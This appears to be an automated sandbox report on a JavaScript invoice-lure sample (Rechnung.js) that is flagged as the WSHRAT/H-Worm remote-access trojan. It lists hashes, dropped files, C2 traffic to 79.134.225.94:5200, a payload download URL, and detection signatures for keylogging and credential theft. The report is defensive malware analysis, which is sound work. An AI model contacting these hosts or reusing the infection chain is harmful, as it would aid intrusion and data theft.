Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 18, 2021, 12:05 a.m.	March 18, 2021, 12:07 a.m.

Size	179.3KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`f94bfce5384f10201df977d67ea6c5d1`
SHA256	`ba25eeb1352d5aab2e09eaa942324510ecd964671e7def1e158c3a543534ca1b`
CRC32	`BCD98544`
ssdeep	`3072:+p1gHeX3reX0f6ZKOBRY+7Q0bamKZtvEzKbURCqeGK/6SbIpklgVDSxGfmuZyas:+p1gHeX3reX0f6ZKwRY+cM24RCqeGKZR`
Yara	rat_vnc - Remote Administration toolkit VNC

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Rechnung.js
2332
- wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
  2236
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
wshsoft.company	A 194.59.164.67	194.59.164.67
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
164.124.101.2	Active	Moloch
194.59.164.67	Active	Moloch
208.95.112.1	Active	Moloch
79.134.225.94	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49202 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49202 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49199 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49220 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 79.134.225.94:5200	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 79.134.225.94:5200	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 18, 2021, 12:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 18, 2021, 12:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 18, 2021, 12:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 18, 2021, 12:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 18, 2021, 12:05 a.m.	computer_name: TEST22-PC	1	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (2 events)

request	GET http://ip-api.com/json/
request	GET http://wshsoft.company/python27.zip

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 18, 2021, 12:05 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d02000 process_handle: 0xffffffff	1	0	0

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (1 event)

description

wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (15 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3343701 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351093 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:05 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:06 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:06 a.m.	number_of_free_clusters: 3351091 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:06 a.m.	number_of_free_clusters: 3351351 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:06 a.m.	number_of_free_clusters: 3351351 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 18, 2021, 12:06 a.m.	number_of_free_clusters: 3351351 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW March 18, 2021, 12:06 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13714161664 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1

Looks up the external IP address (1 event)

domain

ip-api.com

Creates executable files on the filesystem (46 events)

file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\sqlite3.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-profile-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libcrypto-1_1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libssl-1_1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tcl86t.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-datetime-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-multibyte-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-sysinfo-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-handle-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-errorhandling-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-rtlsupport-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-console-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tk86t.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\ctypes\macholib\fetch_macholib.bat
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-memory-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-debug-l1-1-0.dll

Drops an executable to the user AppData folder (50 out of 65 events)

file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_aesni.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-debug-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_cfb.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\_ctypes.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-memory-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-sysinfo-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_des3.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_ctr.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-errorhandling-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_arc2.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-console-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_aes.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\sqlite3.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_ofb.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libcrypto-1_1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_chacha20.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_Salsa20.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_ARC4.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-datetime-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-handle-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_des.cp37-win32.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libssl-1_1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tk86t.dll

Potentially malicious URLs were found in the process memory dump (50 out of 1373 events)

url	https://nid.naver.com/login/css/global/desktop/w_20190509.css?dt=20190509
url	http://www.expedia.com/favicon.ico
url	http://uk.ask.com/favicon.ico
url	http://www.priceminister.com/
url	http://google.com/
url	http://blogimgs.naver.com/nblog/skins/wholebox/0126_f982.gif
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38528621599152653.jpeg%22
url	http://www.iask.com/favicon.ico
url	https://s.pstatic.net/static/www/mobile/edit/2020/0804/cropImg_728x360_38481254551659019.jpeg
url	https://s.pstatic.net/shopping.phinf/20200805_10/f1e83251-9248-4d4e-8d2e-d1505a55bc83.jpg?type=f214_292
url	http://www.merlin.com.pl/favicon.ico
url	http://www.cnet.com/favicon.ico
url	https://ssl.pstatic.net/tveta/libs/assets/js/common/min/probe.min.js
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic1.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0806%2FcropImg_222x145_38626953912837677.png%22
url	https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
url	http://fpdownload.macromedia.com/pub/flashplayer/masterversion/crossdomain.xml
url	https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png
url	http://www.snee.com/xml/xslt/sample.doc
url	http://www.yceml.net/0559/10408495-1499411010011
url	https://s.pstatic.net/static/www/mobile/edit/2018/0206/cropImg_166x108_118371466370743504.jpeg
url	https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/529.png
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22
url	http://blogimgs.naver.net/nblog/mylog/post/btn_cancel3.gif
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/controls.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	https://ssl.pstatic.net/static/pwe/nm/b.gif
url	http://search.nifty.com/
url	https://castbox.shopping.naver.com/js/lazyload.js
url	http://ns.adobe.com/exif/1.0/
url	https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg
url	https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2Fmobile_17061525298c.jpg%22
url	http://www.etmall.com.tw/
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0804%2Fmobile_212629657646c.jpg%22
url	http://search.goo.ne.jp/
url	http://fr.wikipedia.org/favicon.ico
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	http://busca.estadao.com.br/favicon.ico
url	http://search.hanafos.com/favicon.ico
url	https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png
url	https://tistory3.daumcdn.net/tistory/807805/skin/images/footerbg.jpg
url	http://search.chol.com/favicon.ico
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png
url	http://search.livedoor.com/favicon.ico
url	https://file-examples-com.github.io/uploads/2017/02/file-sample_1MB.doc
url	https://ssl.pstatic.net/static/common/myarea/myInfo.gif
url	http://amazon.fr/

Yara rule detected in process memory (50 out of 91 events)

description	Listen for incoming communication	rule	network_tcp_listen
description	Malware can spread east-west file	rule	spreading_file
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Hijack network configuration	rule	hijack_network
description	Create a windows service	rule	create_service
description	Create a COM server	rule	create_com_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over Toredo network	rule	network_toredo
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Communication using dga	rule	network_dga
description	Escalade priviledges	rule	escalate_priv
description	Take screenshot	rule	screenshot
description	Run a keylogger	rule	keylogger
description	Steal credential	rule	cred_local
description	Record Audio	rule	sniff_audio
description	APC queue tasks migration	rule	migrate_apc
description	Malware can spread east-west file	rule	spreading_file
description	Malware can spread east-west using share drive	rule	spreading_share
description	Create or check mutex	rule	win_mutex
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	Match Windows Inet API library declaration	rule	Str_Win32_Wininet_Library
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Hijack network configuration	rule	hijack_network
description	Create a windows service	rule	create_service

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

Communicates with host for which no DNS query was performed (1 event)

host

79.134.225.94

Wscript.exe initiated network communications indicative of a script based payload download (50 out of 2458 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA March 18, 2021, 12:05 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
InternetReadFile March 18, 2021, 12:05 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.5079,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:06 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:06 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW March 18, 2021, 12:06 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
